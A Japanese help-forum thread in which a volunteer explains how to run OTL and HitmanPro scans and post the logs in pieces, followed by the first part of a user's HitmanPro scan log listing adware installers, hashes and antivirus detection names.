コピペが完了しましたらメモ帳を終了させ、[Run Scan]をクリックしてスキャンを行ってください。
スキャン完了まで数分程度かかりますので、今しばらくお待ちください。
スキャンが完了しましたら、OTLを保存した場所と同じところに、
OTL.txtとExtras.txtが出力されますので、こちら2つと先に保存したHPのログを貼り付けてご連絡ください。
なお、OTLもHPもその特性上、非常に長文となりがちです。
こちらの掲示板の文字数上限がひらがな換算で約3万文字、ローマ字換算で約6万文字です。
(より正確には件名を含めてJIS換算65,535バイトまで。全角文字・全角記号2バイト、
半角文字・半角記号1バイト、絵文字等特殊文字3バイト)
確実に文字数オーバーとなりますので、余裕を見て5万5千文字程度になるように、
以下のURLの文字数カウンター等で確認しつつ、ログを分割されてご連絡ください。
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html

指示ありがとうございます。
以下にログを貼っていきますのでご指示お願いします。

ＨＰログ１

Saved date: 2015/04/21 1:34:25
Files detected: 148
Files scanned: 9,244
Processes scanned: 56
Modules scanned: 616
ASEPs scanned: 500
Downloads scanned: 21
Deep analysis: 129/33
---------------------------------------------------------------------------------

Files

---------------------------------------------------------------------------------

File path: c:\program files\intel\icls client\heciserver.exe
Publisher: Intel(R) Corporation
Signer: Intel® Upgrade Service
MD5: b353f1834fcd36d77be3f74992c147d4
SHA-1: 95db008d29b9ae312ccdda744f474c2d72cc5388
Created: 2012/06/19 19:10:34
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Kazy.20914 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\divx\divx update\divxupdate.exe
Publisher:
Signer: DivX, LLC
MD5: c7f05a3fd4a8dc4ee7a7866876e1534c
SHA-1: a217384831c5dedc7a39566486867236fffc0de9
Created: 2013/11/15 9:48:30
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Startup.DivX.K

---------------------------------------------------------------------------------

File path: c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.8428_none_d08a11e2442dc25d\msvcr80.dll
Publisher: Microsoft Corporation
MD5: a58e3c42883f36d743f9be9b21bfc990
SHA-1: 5a3fb51c414bde296273e41198ecb1a2aa9e3b03
Created: 2013/08/22 8:53:00
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Laneul (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\amarectv live\amvideocapture.ax
Publisher: Microsoft Corporation
MD5: 36ffb794024c27b89d3934e0e82545d4
SHA-1: bbf41bf443763f5b5a721d3bc27952fe5c353b75
Created: 2013/08/25 17:40:25
Detections: 1
Determination: Inconclusive
- Dr.Web as Trojan.DownLoader.origin (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\system32\drivers\intcdaud.sys
Publisher: Intel(R) Corporation
MD5: f5495b38bfb9149925f54f65ab40efbf
SHA-1: 3fbef8ee216245a0b26e3fb24f6345605a0b440b
Created: 2012/09/20 11:39:50
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Adware.SMSHoax.95 (Adware)

---------------------------------------------------------------------------------

File path: c:\windows\downloaded program files\hgstartjp28.exe
Publisher: NHN Japan Corp.
Signer: NHN PlayArt Corporation
MD5: d46fa9949bc57a861613708035cb66fa
SHA-1: d605dacdb0cb140033a3d8711c2d563fccd6e08f
Created: 2013/12/25 10:19:38
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc\manifest.json
Publisher:
MD5: ebb718d9043c987b2a05265acfab9493
SHA-1: df01f0e262d5b287a78c4d7eadfe7ed7eadd9cd9
Created: 2015/02/25 17:39:32
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.UnIDealsi (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole\207\manifest.json
Publisher:
MD5: 66adcd8e1f66a3bf3ead0886bd4d0ff8
SHA-1: 08f087938774243023749b8bd237b58069f4f119
Created: 2015/03/04 15:50:12
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\manifest.json
Publisher:
MD5: ee8011d5d5c5b99b03ce5ea057a656ba
SHA-1: 087e8440edf21b761da86ebac8c364f0ff0a18aa
Created: 2015/03/24 16:16:07
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\manifest.json
Publisher:
MD5: 0bbe417460075bdd8b42b3e04e936a02
SHA-1: 93b022ad36611ffb7ff14a37b91aa45a8cebee0a
Created: 2015/02/04 12:00:08
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\manifest.json
Publisher:
MD5: 93e34b017b195ac98aba32e64eede9f2
SHA-1: bfa2f63a3c2189cdb8696422f2fd9d4be2f2dbe5
Created: 2015/02/04 12:00:09
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\manifest.json
Publisher:
MD5: a714af2a39fed9f5dc8346b530c2fc39
SHA-1: 823115c02f95d4928dc78b01632a7349a4bd597c
Created: 2015/04/04 21:32:07
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\manifest.json
Publisher:
MD5: 2d922aa30def0a058f85601f8acb5ce5
SHA-1: 62f069a274a987013c2c75ad46a4487355b0dea2
Created: 2014/05/10 0:40:48
Detections: 1
Determination: Adware
- Reason as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\neopleplugin\npneoplegameinstaller.dll
Publisher:
Signer: Neople Inc.
MD5: c3517e56484ee9a628e4d30553ee53cd
SHA-1: 395542a67a1c8304b1bbcd75ba737d90e3624b47
Created: 2014/01/21 0:49:30
Detections: 1
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0305 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\tw628j.exe
Publisher: Nexon
MD5: 981d03f6045afca56c2bd65569f2d9b3
SHA-1: 64dfbeea35f8bb552cf4d596adc70e00df231e4b
Created: 2014/12/27 19:42:39
Detections: 4
Determination: UndefinedMalware
- McAfee as Artemis!981D03F6045A (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0320 (Undefined)
- Dr.Web as Trojan.DownLoader12.31742 (Undefined)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\cr_downloader_for_super-smash-bros..exe
Publisher:
Signer: eCHANG Net Inc.
MD5: a5d94a42084583274d587f2658efd487
SHA-1: 2fc5943c64add6d948b40906fa7c53691c15901f
Created: 2014/11/14 12:33:39
Detections: 13
Determination: Adware
- Reason Heuristics as Threat.Installer.eCHANGNet (Undefined)
- Dr.Web as Trojan.InstallCore.260 (Adware)
- ESET NOD32 as Win32/InstallCore.TS potentially unwanted application (Adware)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- Zillya! Antivirus as Adware.InstallCore.Win32.156 (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Comodo Security as Application.Win32.InstallCore.DSQ (Adware)
- Sophos as Install Core Click run software (Undefined)
- G Data as Win32.Application.InstallCore.CR (Adware)
- AVG as Generic (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setup project64 2.1.exe
Publisher:
MD5: 1ee1efeb58a4047d6e2478e77f4da082
SHA-1: c3937102b74aae33c7725020f68d998a99cd044b
Created: 2014/11/13 22:01:41
Detections: 1
Determination: Ignore detections (false positive)
- NANO AntiVirus as Trojan.Win32.Ramnit.ctcknk (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dtlite4491-0356.exe
Publisher: Disc Soft Ltd
Signer: Disc Soft Ltd
MD5: 0fa6cd1de96bde0431c1c91904f6d040
SHA-1: e750c443a83f9b135b499e7917c5a93120384bb3
Created: 2014/10/28 20:23:09
Detections: 5
Determination: Adware
- Malwarebytes as PUP.Optional.OpenCandy (Adware)
- Trend Micro House Call as TROJ_GEN.F47V0313 (Undefined)
- VIPRE Antivirus as Opencandy (Adware)
- ESET NOD32 as Win32/DownWare (Adware)
- Rising Antivirus as PE:PUF.OpenCandy!1.9DE5 (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\daemon347_inst.exe
Publisher:
Signer: Well Known Media Ltd
MD5: 631515cfed3b53893ff8f3869ec3b842
SHA-1: ebeb8dee144e1b00ea78467dddc1eb0a50cc2e7c
Created: 2014/10/28 20:19:37
Detections: 13
Determination: Adware
- Reason Heuristics as Threat.Installer.WellKnownMedia (Undefined)
- Dr.Web as Trojan.InstallCore.2 (Adware)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- K7 AntiVirus as Unwanted-Program (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dhpyhc (Adware)
- Sophos as PUA 'Install Core Click run software' (Undefined)
- Avira AntiVirus as Adware/InstallCore.770360 (Adware)
- ESET NOD32 as Win32/InstallCore.QS potentially unwanted application (Adware)
- AVG as Generic (Undefined)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Comodo Security as Application.Win32.InstallCore.AEK (Adware)
- Bkav FE as W32.HfsAdware (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\fileopenersetup.exe
Publisher:
Signer: Delivery X Apps
MD5: a007ca72a067429e55c9eef1c75b3bf9
SHA-1: 2725608ca62fa23b4761cec758892695955fcb27
Created: 2014/10/28 20:18:36
Detections: 11
Determination: Adware
- Reason Heuristics as Threat.installCore.Installer.ironSource (Adware)
- avast! as Malware-gen (Undefined)
- VIPRE Antivirus as Threat.4788237 (Undefined)
- AVG as Potentially harmful program Toolbar.MySearchDial (Undefined)
- F-Prot as W32/InstallCore.AG.gen (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dqhert (Adware)
- McAfee Web Gateway as BehavesLike.Win32.CryptInno.bc (Undefined)
- Avira AntiVirus as PUA/InstallCore.Gen (Adware)
- G Data as Win32.Application.InstallCore.CZ (Adware)
- ESET NOD32 as Win32/InstallCore.RY potentially unwanted (variant) (Adware)
- IKARUS anti.virus as PUA.Toolbar.MySearchDial (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\freemakeaudioconvertersetup.exe
Publisher: Ellora Assets Corporation
Signer: Ellora Assets Corp.
MD5: 397f5109b66b79533e85762419bfc058
SHA-1: 87ce2c0ccabef8c1e9ec55d5e69ebb79b6476a77
Created: 2014/06/29 0:07:11
Detections: 5
Determination: Adware
- NANO AntiVirus as Riskware.Win32.OpenCandy.cxjcyz (Adware)
- ESET NOD32 as Win32/OpenCandy (Adware)
- Trend Micro House Call as TROJ_GEN.F47V0526 (Undefined)
- Dr.Web as Adware.Toolbar.213 (Adware)
- Fortinet FortiGate as Riskware/OpenCandy (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\lineinst.exe
Publisher: LINE Corporation
Signer: LINE Corporation
MD5: 3cd964cdf714f4d1158fa64f47293abf
SHA-1: 59963b608ae4972f051fda607b8538d42cd31abb
Created: 2014/05/28 21:50:48
Detections: 1
Determination: Ignore detections (false positive)
- IKARUS anti.virus as Trojan.Win32.Tracur (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloadmanagersetup.exe
Publisher:
Signer: ADLSoft
MD5: 28f98f137b7d2873318cea6687d245f9
SHA-1: b27868ce2fc27aa875bf13ea1d1e5dcc88959f24
Created: 2014/05/14 18:30:29
Detections: 18
Determination: Adware
- Reason Heuristics as Threat.ironSource.Installer (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4788237 (Undefined)
- Malwarebytes as PUP.Optional.InstallCore.A (Adware)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Avira AntiVirus as ADWARE/InstallCore.Gen9 (Adware)
- Sophos as PUA 'Install Core Click run software' (Undefined)
- ESET NOD32 as Win32/InstallCore.JP potentially unwanted application (Adware)
- AVG as InstallC (Undefined)
- Qihoo 360 Security as Malware.QVM06.Gen (Undefined)
- avast! as Malware-gen (Undefined)
- Zillya! Antivirus as Trojan.Badur.Win32.4817 (Undefined)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dfgmky (Adware)
- McAfee Web Gateway as BehavesLike.Win32.CryptInno.bc (Undefined)
- G Data as Win32.Application.InstallCore.CZ (Adware)
- Bkav FE as W32.HfsAdware (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\adlsoft_uncompressor_v2_3.exe
Publisher:
Signer: ADLSoft
MD5: 56f67f390f2a6e24cc0dc5592d67c389
SHA-1: 1730c54cdc126a1623fbfad34179571b467261ee
Created: 2012/11/08 19:00:58
Detections: 10
Determination: Adware
- Dr.Web as Adware.InstallCore.75 (Adware)
- Avira AntiVirus as ADWARE/InstallCore.Gen (Adware)
- Sophos as Install Core ADLSoft (Undefined)
- Antiy Labs AVL as Trojan/Win32.SGeneric (Undefined)
- AhnLab V3 Security as Adware/Win32.InstallCore (Adware)
- Vba32 AntiVirus as BScope.Malware-Cryptor.InstallCore.2691 (Adware)
- ESET NOD32 as Win32/InstallCore.AY (variant) (Adware)
- Rising Antivirus as PE:Malware.XPACK-LNR/Heur!1.5594 (Undefined)
- Fortinet FortiGate as Riskware/InstallCore (Adware)
- Reason Heuristics as PUP.ADLSoft.J (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\ccsetup404.exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: c748c104ba13a9456496d264c4161e7c
SHA-1: 6525f85f423a8acb9de261fce7c1bfdcaf0651ec
Created: 2013/08/24 1:43:16
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\ccsetup413.exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: 55bc08e32879a3de7386a2695d668304
SHA-1: da0fb77cecb4247f067294da5e54e0020844fece
Created: 2014/05/10 0:39:40
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\chorokuf128a(1).exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: ab8132bb986a626a7aba2cf08d611c56
SHA-1: 2d1ee43f2758cf9b7933c34bdd58c63081eded43
Created: 2014/02/12 20:23:31
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\chorokuf128a.exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: ab8132bb986a626a7aba2cf08d611c56
SHA-1: 2d1ee43f2758cf9b7933c34bdd58c63081eded43
Created: 2014/02/12 20:22:51
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\codecpackage.exe
Publisher:
Signer: JumpyApps
MD5: 554bd7664471d159f2a48b254c1f05ac
SHA-1: 699dd12ad0dc35006a1e677478d2858532caae90
Created: 2014/02/15 0:24:09
Detections: 14
Determination: Adware
- Reason Heuristics as Threat.ironSource.Bundler (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- NANO AntiVirus as Trojan.Win32.Kryptik.cwezfs (Undefined)
- Comodo Security as Application.Win32.InstallCore.KH (Adware)
- Sophos as Install Core Click run software (Undefined)
- AhnLab V3 Security as PUP/Win32.DownloadManager (Adware)
- G Data as Win32.Application.InstallCore (Adware)
- ESET NOD32 as Win32/InstallCore.JK potentially unwanted (variant) (Adware)
- AVG as InstallCore (Adware)
- Panda Antivirus as Trj/Genetic.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dolphin-3.5-x64.exe
Publisher: Igor Pavlov
MD5: 701b0088f5e0cd0611b4d87a4f2e13c0
SHA-1: 0755acd03cc6540bf938706e1e75bb63fb1c3bfd
Created: 2013/01/27 5:35:27
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Trojan.Win32.A.Clicker.5457448 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29(1).exe
Publisher: SoftWarehouse
Signer: Artur Kozak
MD5: 54179095d23898a8bae9bfa3c8549233
SHA-1: 44b8769b4326e52366987f495108a90b3dd185cf
Created: 2014/01/12 15:33:31
Detections: 35
Determination: Adware
- Reason Heuristics as Adware.WebPick.Installer (Adware)
- McAfee as Program.PUP-FHQ (Adware)
- F-Prot as W32/InstallRex.B (Undefined)
- Dr.Web as Trojan.WebPick.4 (Undefined)
- ESET NOD32 as Win32/InstalleRex.M potentially unwanted application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- F-Secure as Riskware.Gen:Variant.Application.Bundler (Adware)
- avast! as Win32:InstalleRex-AH [PUP] (Adware)
- Kaspersky as Trojan.Win32.AntiFW (Undefined)
- VIPRE Antivirus as Threat.4150696 (Undefined)
- Bkav FE as W32.FamVT.AntiFWK.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Quick Heal as Trojan.AntiFW.A5 (Undefined)
- Malwarebytes as PUP.Optional.InstalleRex (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.Downware.csjrze (Adware)
- Bitdefender as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Agnitum Outpost as PUA.InstalleRex (Adware)
- Comodo Security as Application.Win32.InstalleRex.KG (Adware)
- Zillya! Antivirus as Downloader.Adload.Win32.16938 (Undefined)
- McAfee Web Gateway as BehavesLike.Win32.StartPage.fc (Undefined)
- Sophos as InstallRex (Undefined)
- Avira AntiVirus as ADWARE/InstallRex.Q (Adware)
- Antiy Labs AVL as Trojan/Win32.AntiFW.b (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- AhnLab V3 Security as PUP/Win32.TSULoader (Adware)
- G Data as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Rising Antivirus as PE:Trojan.DL.Win32.AntiFW.a!1075355932 (Undefined)
- IKARUS anti.virus as PUA.TDownloader (Adware)
- Fortinet FortiGate as Riskware/InstalleRex (Undefined)
- AVG as InstallRex.7cb (Undefined)
- Panda Antivirus as PUP/TSUploader (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29.exe
Publisher: SoftWarehouse
Signer: Artur Kozak
MD5: 96b51a7d042bdd49c56fa49654fee130
SHA-1: c76502c49134c78c792852a144fe23981dcf8a3d
Created: 2014/01/12 15:33:16
Detections: 36
Determination: Adware
- Reason Heuristics as Adware.WebPick.Installer (Adware)
- Dr.Web as Trojan.WebPick.4 (Undefined)
- avast! as Win32:InstalleRex-AH [PUP] (Adware)
- F-Prot as W32/InstallRex.B (Undefined)
- McAfee as Program.PUP-FHQ (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- ESET NOD32 as Win32/InstalleRex.M potentially unwanted application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- F-Secure as Riskware.Gen:Variant.Application.Bundler (Adware)
- VIPRE Antivirus as Threat.4150696 (Undefined)
- Clam AntiVirus as Win.Trojan.Installerex-28 (Undefined)
- Bkav FE as W32.FamVT.AntiFWK.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Quick Heal as Trojan.AntiFW.A5 (Undefined)
- Malwarebytes as PUP.Optional.InstalleRex (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.Downware.csjrze (Adware)
- Bitdefender as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Agnitum Outpost as PUA.InstalleRex (Adware)
- Comodo Security as Application.Win32.InstalleRex.KG (Adware)
- Zillya! Antivirus as Downloader.Adload.Win32.16938 (Undefined)
- McAfee Web Gateway as BehavesLike.Win32.StartPage.fc (Undefined)
- Sophos as InstallRex (Undefined)
- Avira AntiVirus as ADWARE/InstallRex.Q (Adware)
- Antiy Labs AVL as Trojan/Win32.AntiFW.b (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- AhnLab V3 Security as PUP/Win32.TSULoader (Adware)
- G Data as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Rising Antivirus as PE:Trojan.DL.Win32.AntiFW.a!1075355932 (Undefined)
- IKARUS anti.virus as PUA.TDownloader (Adware)
- Fortinet FortiGate as Riskware/InstalleRex (Undefined)
- AVG as InstallRex.7cb (Undefined)
- Panda Antivirus as PUP/TSUploader (Adware)
- Kaspersky as Trojan.Win32.AntiFW (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dtlite4454-0314.exe
Publisher: DT Soft Ltd
Signer: DT Soft Ltd
MD5: 2763b8ac8f1e3a56241600a70a2923a6
SHA-1: 4743c9c447de0f25d3ac8b6009d7265f5721df05
Created: 2012/12/15 23:20:26
Detections: 5
Determination: Adware
- Malwarebytes as PUP.Optional.OpenCandy (Adware)
- VIPRE Antivirus as Opencandy (Adware)
- Antiy Labs AVL as Virus/Win32.Suspic.gen (Undefined)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)
- Rising Antivirus as NS:Malware.Install!1.9F62 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\file_opener.exe
Publisher:
Signer: Fried Cookie Ltd
MD5: 0775db62b3bff112aa1150bc831c1ff5
SHA-1: bd5e4e695f47d0812d435dda57d3bad789143ee7
Created: 2013/08/03 2:24:09
Detections: 18
Determination: Adware
- MicroWorld eScan as Gen:Variant.Application.InstallCore.1 (Adware)
- The Hacker as Trojan/Kryptik.pvk (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- Norman as FakeNSIS.A (Undefined)
- Bitdefender as Gen:Variant.Application.InstallCore.1 (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.InstallCore.1 (Adware)
- Sophos as Install Core Installer (Undefined)
- Comodo Security as UnclassifiedMalware (Undefined)
- F-Secure as Gen:Variant.Application.InstallCore (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Avira AntiVirus as ADWARE/InstallCore.Gen (Adware)
- Microsoft Security Essentials as SoftwareBundler:Win32/DealPly (Undefined)
- G Data as Gen:Variant.Application.InstallCore (Adware)
- Vba32 AntiVirus as Downware.InstallCore (Adware)
- ESET NOD32 as Win32/InstallCore.BG (Adware)
- IKARUS anti.virus as SoftwareBundler (Undefined)
- Reason Heuristics as PUP.FriedCookie.L (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\gasim_117_bin.exe
Publisher: heropa@dream.com
MD5: 489d4beb27ccac989c15968887548de0
SHA-1: c27eb6b337d4a7a1aafedf16d1c64147d7c66713
Created: 2012/11/04 11:27:38
Detections: 1
Determination: Ignore detections (false positive)
- Zillya! Antivirus as Trojan.Obfuscated.Win32.69460 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\hijackthis (1).exe
Publisher: Trend Micro Inc.
MD5: 47811d50390a86a17102d7496e6eabb9
SHA-1: 2623749cdb27887f6746acdee7e8065475f8b541
Created: 2015/03/20 18:33:59
Detections: 2
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.HeurC.KVM099.a.(kcloud) (Undefined)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\installer_manycam_3_0_92_japanese.exe
Publisher:
Signer: Vittalia Internet S.L.
MD5: 8afbd41939d934a25e2e093ef0be29f0
SHA-1: 52e7fe579be76a761e1a4f59c194a434163bc72b
Created: 2012/11/06 16:22:08
Detections: 15
Determination: Adware
- Reason Heuristics as Threat.Vittalia.Bundler (Undefined)
- Dr.Web as Trojan.Vittalia.38 (Undefined)
- ESET NOD32 as Win32/Toolbar.Babylon potentially unwanted application (Adware)
- VIPRE Antivirus as Threat.4782551 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- McAfee as Artemis!75E68C0C7910 (Undefined)
- Malwarebytes as PUP.Optional.VIT (Adware)
- Norman as InstallCore.WTRR (Adware)
- NANO AntiVirus as Riskware.Nsis.Adware.dciphs (Adware)
- McAfee Web Gateway as BehavesLike.Win32.Suspicious.vc (Undefined)
- Avira AntiVirus as ADWARE/Vittalia.AB (Adware)
- Kingsoft AntiVirus as Win32.Malware.Heur_Generic.A.(kcloud) (Undefined)
- Rising Antivirus as NS:PUF.SilenceInstaller!1.9DDF (Undefined)
- AVG as Win.Threat.Medium (Undefined)
- Qihoo 360 Security as Trojan.Generic (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\lpls159.exe
Publisher:
MD5: c32d41f732157a8802c9215789623551
SHA-1: e7a3240a750fd0e7f1f174bf1743e21ceca81c36
Created: 2012/11/04 11:20:03
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as suspected of Trojan.StartPage.7 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe
Publisher: Systweak Inc
Signer: Systweak Software
MD5: e86327e2048326af5065ce3e2970c776
SHA-1: abf2e0f5fc59de2cbf4044921a73e8d1ac6ff39a
Created: 2013/08/21 22:52:38
Detections: 2
Determination: Inconclusive
- Malwarebytes as PUP.Optional.RegCleanerPro (Adware)
- Reason Heuristics as PUP.Optional.Installer.SystweakSoftware.V (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setup.exe
Publisher:
Signer: Fried Cookie Ltd
MD5: 45e2a98e47c209814bcea691bcac5f78
SHA-1: 6717a81c60116dfc1004665c269044de9c506cd2
Created: 2013/03/16 4:00:44
Detections: 8
Determination: Adware
- Reason Heuristics as Threat.ironSource.Bundler (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- NANO AntiVirus as Riskware.Nsis.Babylon.cwhyhv (Adware)
- McAfee Web Gateway as BehavesLike.Win32.Suspicious.vc (Undefined)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)
- AVG as MultiBundle (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setupmbs.exe
Publisher:
MD5: 6126b4029e2c746348a2ed4e2eabf517
SHA-1: 6546816bf88508a3a1f78685b13467abc53fd7bd
Created: 2015/02/05 19:59:12
Detections: 1
Determination: Ignore detections (false positive)
- Qihoo 360 Security as HEUR/QVM41.1.Malware.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\soundengine_free_500.exe
Publisher: Coderium
MD5: b3395cbbda3be3f535aa233161ad2589
SHA-1: 67bdcd5c5985bc8b42b04f8713eb466a293850b9
Created: 2012/10/31 21:01:25
Detections: 2
Determination: Ignore detections (false positive)
- F-Prot as W32/Backdoor2.BFDU (Undefined)
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\vlcmediaplayersetup-6zgtwof.exe
Publisher:
Signer: Somoto Ltd.
MD5: aaa3b894bae6569f0146d7f0c6105308
SHA-1: cf227d4aa26882dee86fbfa301d3342833ddbc7c
Created: 2013/01/27 5:39:25
Detections: 28
Determination: Adware
- MicroWorld eScan as Application.Bundler.Somoto.I (Undefined)
- Malwarebytes as PUP.Optional.Somoto (Adware)
- K7 AntiVirus as Trojan (Undefined)
